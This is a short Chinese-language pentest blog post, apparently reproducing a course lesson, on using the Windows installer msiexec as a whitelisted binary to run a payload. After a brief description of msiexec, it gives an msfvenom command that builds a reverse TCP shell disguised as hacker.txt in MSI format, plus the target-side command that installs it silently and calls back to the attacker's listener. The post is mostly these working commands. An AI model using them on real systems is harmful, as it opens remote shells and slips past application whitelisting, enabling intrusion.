渗透测试-基于白名单执行payload--Msiexec

渗透测试-基于白名单执行payload--Msiexec

复现亮神课程  基于白名单执行payload--Msiexec

 

 

0x01 关于msiexec

Msiexec 是 Windows Installer 的一部分。用于安装 Windows Installer 安装包(MSI),一般在运行 Microsoft Update 安装更新或安装部分软件的时候出现,占用内存比较大。并且集成于 Windows 2003,Windows 7 等。

说明:Msiexec.exe所在路径已被系统添加PATH环境变量中,因此,Msiexec命令可识别。

 

 

Windows 2003 默认位置:

C:\WINDOWS\system32\msiexec.exe

C:\WINDOWS\SysWOW64\msiexec.exe

 

渗透测试-基于白名单执行payload--Msiexec_第1张图片

 

 

渗透测试-基于白名单执行payload--Msiexec_第2张图片

 

 


 

0x02 复现

 

Msf配置:

渗透测试-基于白名单执行payload--Msiexec_第3张图片

 

 

 

配置payload:

msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.190.141 LPORT=4444 -f msi > hacker.txt

渗透测试-基于白名单执行payload--Msiexec_第4张图片

 

 

靶机执行:

C:\Users\Administrator\Desktop\Msiexec>msiexec /q /i hacker.txt

 

 渗透测试-基于白名单执行payload--Msiexec_第5张图片

 

渗透测试-基于白名单执行payload--Msiexec_第6张图片

 

posted @ 2019-05-02 09:46 卿先生 阅读(...) 评论(...) 编辑 收藏

你可能感兴趣的:(内网渗透,权限提升,Web渗透)